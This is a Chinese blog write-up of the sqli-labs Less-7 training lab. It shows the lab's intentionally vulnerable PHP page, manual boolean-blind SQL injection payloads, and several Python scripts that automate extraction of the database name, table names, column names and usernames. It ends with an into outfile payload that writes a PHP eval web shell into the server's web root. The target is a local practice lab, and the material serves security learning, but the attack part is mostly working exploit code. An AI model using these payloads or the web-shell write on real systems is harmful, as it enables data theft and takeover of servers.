sqli-labs:less-7

最新推荐文章于 2024-06-09 15:52:11 发布
最新推荐文章于 2024-06-09 15:52:11 发布
阅读量308 收藏 2
点赞数
分类专栏: SQL注入 文章标签: sql注入 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42702981/article/details/118724648
版权

SQL注入 布尔盲注 数据库探测 shell脚本 安全漏洞
关键词由CSDN通过智能技术生成 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-7 Dump into Outfile</title>

</head>

<body bgcolor="#000000">

<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-7.jpg" /></center>
</body>
</html>

 第一种方法:布尔盲注

?id=1(返回这样: You are in.... Use outfile......)
?id=1 and 1=2(正常回显,不是数字型,现在还哪有什么数字型啊,都可以不试了)
?id=1'(报错)
?id=1'--+(依然报错)
?id=1"(正常)
?id=1" and "1"="1(正常)
?id=1" and "1"="2(正常,不对劲,不是双引号)
?id=1')--+(错误)
?id=1'))--+(正常)
?id=1')) and 1=1--+(正常)
?id=1')) and 1=2--+(错误)

这里因为除了两个页面以外,其他什么都不显示,所以用bool盲注测试。(这里只演示爆破语句,python脚本附在后面)
?id=1')) and length((select database()))=8--+(回显正常,说明当前数据库名的长度是8)

?id=1')) and ascii(substr((select database()),1,1))=115--+(回显正常,说明数据库名字第一个字母的ASCII码为115)

?id=1')) and (select count(table_name) from information_schema.tables where table_schema=database())=4--+(爆破表的个数)

?id=1')) and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6--+(爆破表名的长度)
?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))=1--+(爆破表名)

?id=1')) and (select count(column_name) from information_schema.columns where table_name='users'and table_schema=database())=3--+(爆列数)
?id=1')) and length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1))=2--+(爆破列名长度)
?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),0,1))=1--+(爆破列名)


接下来就是爆破数据了:
?id=1')) and (select count(username) from users)=13--+(爆破有多少条数据  #是从0开始的# )
?id=1')) and length(substr((select username from users limit 0,1),1))=1--+(判读数据长度)
?id=1')) and ascii(substr((select username from users limit 0,1),1,1))=1--+(爆破数据)

 判断数据库名长度:

#coding:utf-8
import requests
from bs4 import BeautifulSoup

response=requests.session()
url ='http://localhost/sqli-labs-master/Less-7'
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
for i in range(1,30):
    payload="?id=1')) and length((select database()))={}--+".format(i)
    if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
        print(i)
        break
print("ok")

爆破数据库名:

#coding:utf-8

import requests
from bs4 import BeautifulSoup

response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
print(ord('s'))
database_length=8
database_name=""
for i in range(1,database_length+1):
    for j in range(1,128):
        payload="?id=1')) and ascii(substr((select database()),{},1))={}--+".format(i,j)
        if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
            database_name = database_name+chr(j)
            break
print(database_name)

爆破表的个数

#coding:utf-8

import requests
from bs4 import BeautifulSoup

url="http://localhost/sqli-labs-master/Less-7/"
database_name="security"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
response=requests.session()
for i in range(1,20):
    payload="?id=1')) and (select count(table_name) from information_schema.tables where table_schema=database())={}--+".format(i)
    if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
        table_number=i
        break
print("table numbers:",table_number)

爆破表名长度:

#coding:utf-8

import requests
from bs4 import BeautifulSoup

response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
table_number=4
for i in range(0,4):
    table_name=""
    for j in range(1,50):
        payload="?id=1')) and length(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),1))={}--+".format(i,j)
        if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
            tablelen=j
            break
    print(tablelen)

爆破表名:

#coding:utf-8

import requests
from bs4 import BeautifulSoup

response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
table_number=4
for i in range(0,4):
    table_name=""
    for j in range(1,50):
        payload="?id=1')) and length(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),1))={}--+".format(i,j)
        if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
            tablelen=j
            break
    print(tablelen)
    for m in range(0,tablelen+1):
        for n in range(1,128):
            name_payload="?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={}--+".format(i,m,n)
            if "You are in.... Use outfile......" in response.get(url+name_payload,headers=headers).text:
                table_name=table_name+chr(n)
                break
    print("表名:",table_name)

爆破列数:

#coding:utf-8

import requests
from bs4 import BeautifulSoup

response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
for i in range(1,30):
    payload="?id=1')) and (select count(column_name) from information_schema.columns where table_name='users'and table_schema=database())={}--+".format(i)
    if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
        column_number=i
        break
print("列数:", column_number)

爆破列名长度:

#coding:utf-8

import requests
from bs4 import BeautifulSoup

response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
column_number=3
for num in range(0,column_number):
    for i in range(1,50):
        payload="?id=1')) and length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),1))={}--+".format(num,i)
        if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
            print("{}列名长度为:".format(num+1),i)
            break

爆破列名:

#coding:utf-8

import requests
from bs4 import BeautifulSoup

response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}

column_number=3
for num in range(0,column_number):
    column_name=""
    for i in range(1,50):
        payload="?id=1')) and length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),1))={}--+".format(num,i)
        if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
            column_length=i
            break
    for m in range(1,column_length+1):
        for n in range(1,128):
            name_payload="?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),{},1))={}--+".format(num,m,n)
            if "You are in.... Use outfile......" in response.get(url+name_payload,headers=headers).text:
                column_name=column_name+chr(n)
                break
    print("第{}列的列名:".format(num+1),column_name)

爆破数据条数:

#coding:utf-8

import requests
from bs4 import BeautifulSoup

response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}

for i in range(1,499):
    payload="?id=1')) and (select count(username) from users)={}--+".format(i)
    if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
        print(i)
        break

爆破数据内容:

#coding:utf-8

import requests
from bs4 import BeautifulSoup

response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
Numbers=13
for i in range(0,Numbers):
    shujv=""
    for j in range(1,30):
        payload="?id=1')) and length(substr((select username from users limit {},1),1))={}--+".format(i,j)
        if "You are in.... Use outfile......"in response.get(url+payload,headers=headers).text:
            shujv_length=j
            break
    for m in range(1,shujv_length+1):
        for n in range(1,128):
            shujv_payload="?id=1')) and ascii(substr((select username from users limit {},1),{},1))={}--+".format(i,m,n)
            if "You are in.... Use outfile......" in response.get(url+shujv_payload,headers=headers).text:
                shujv=shujv+chr(n)
                break
    print("第{}条数据:".format(i+1),shujv)

 第二种方法:SQL注入写shell脚本

1、获取绝对路径:

要写shell那么我们就要知道文件的绝对路径。因为靶场是我们自己配置的,所以可以知道。再有就是可以在less1~6中用@@datadir查询。

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,@@datadir--+

我这里是:E:\PHPStudy\phpstudy_pro\WWW\sqli-labs-master\Less-7

id=1')) and (select count(*) from mysql.user)>0 --+

用这个判断是否返回正常,如果正常就有文件读取权限,反之则没有,需要配置。

2、写shell

?id=1')) union select 1,2,'<?php @eval($_POST["shell"]); ?>' into outfile "E:\\PHPStudy\\phpstudy_pro\\WWW\\test.php"--+

然后蚁剑连一下就好了

~羽~.
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
[网络安全]sqli-labs Less-7 解题详析
等风来
07-23 2486
以上为[网络安全]sqli-labs Less-7 解题详析,后续将分享[网络安全]sqli-labs Less-8 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
sqlilabs—less7
一个普普通通的博客
03-24 2562
sqlilabs—less7
sqli-labs 靶场 less-7 第七关详解:OUTFILE注入与配置
最新发布
Superstacks超全栈
06-09 370
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔注入来测试了。只有列号为3的时候,才能正常显示,则字段长度为3。进入页面中,并输入数据查看结果。输入单引号会提示语法问题。发现空数据提示语法问题。
sqli-labs--Less7
m0_60829468的博客
10-22 2259
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基
Sqli-labs之Less-7
m0_46315342的博客
06-04 3216
                                          &nbs...
Less-7(文件读写操作)
老司机开代码的博客
08-03 1074
文章目录OUTFILE注入实战1. 关卡分析2. 过关斩将2.1 `secure_file_priv`2.2 注入过程 OUTFILE注入 在前面的学习中,我们知道了sql注入中的盲注和双注入是个什么鬼。今天,我门又解锁了一个新的姿势----outfile。 那么outfile是干什么的呢? 简单讲就是将一句话木马通过outfile传入网站目录,然后连上去;然后你就能为所欲为了(理想情况下)。 实...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 7: 初始化数据库 点击 Setup/reset Database for labs。看到一片的 successfully 就是数据库创建成功了。数据库只需要初始化一次,以后都不需要再点击这个重置数据库(reset db)的链接,除非误删数据或者换...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名...
SQLi-LABS Page-1(Basic Challenges)
07-24
在这个挑战中,从Less-1到Less-5,每一关都涉及不同的注入点和策略。例如: 1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并...
422926799#note#sqli-labs第三十六关1
07-25
sqli-labs Less 36关代码如下:Less-36 Bypass MySQL Real Escape String//logging the conn
7.sqli-labs-Less7
qwsn
03-29 1787
Less 7 GET-Dump into outfile-String 1、根据提示:是把字段值写入一个可以输出的文本+字符串类型注入 ①、找闭合类型(看源码) ②、查看目录结构(使用第一关的@@basedir或者@@datadir,或者直接看靶机吧) 2、一直回显查You are in… Use outfile…,很难找出闭合类型; ①看Less7的index.php下的源码:SELECT * ...
Sqli-labs--Less7-10
小人物的博客
05-22 605
Less 7 Dump into outfile 第七关,通过注入导出文件,一句话木马。 需要知道的是根目录,以及mysql中my.ini文件中的secure_file_priv,没有的话可以在my.ini中直接加入,有了这个才能导出。 payload : http://127.0.0.1/sqli-labs/Less-7/index.php?id=-1'))Union sel...
sqli-labs/less7
devilare的博客
12-03 244
sqli-labs7 看题目 输入?id=1!尝试常规操作,id=1’ id=1"等,最后发现只有id=1’时会出现报错,那么开始猜,加括号(别问我为啥,因为习惯吧(狗头保命,大佬友善指点))。最后试出当id=1’))时页面显示正常然后又是接着的常规操作,查看字段union select 1,2,3时为正常显示,但是接下来就不能有常规手段暴库名了因为没有数据回显,所以常规注入进行不了,看看其他办法…Use outfile…试试,这里解释一下: outfile函数可以导出多行,而dumpfile只能导出一
sqli-labs-less1
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值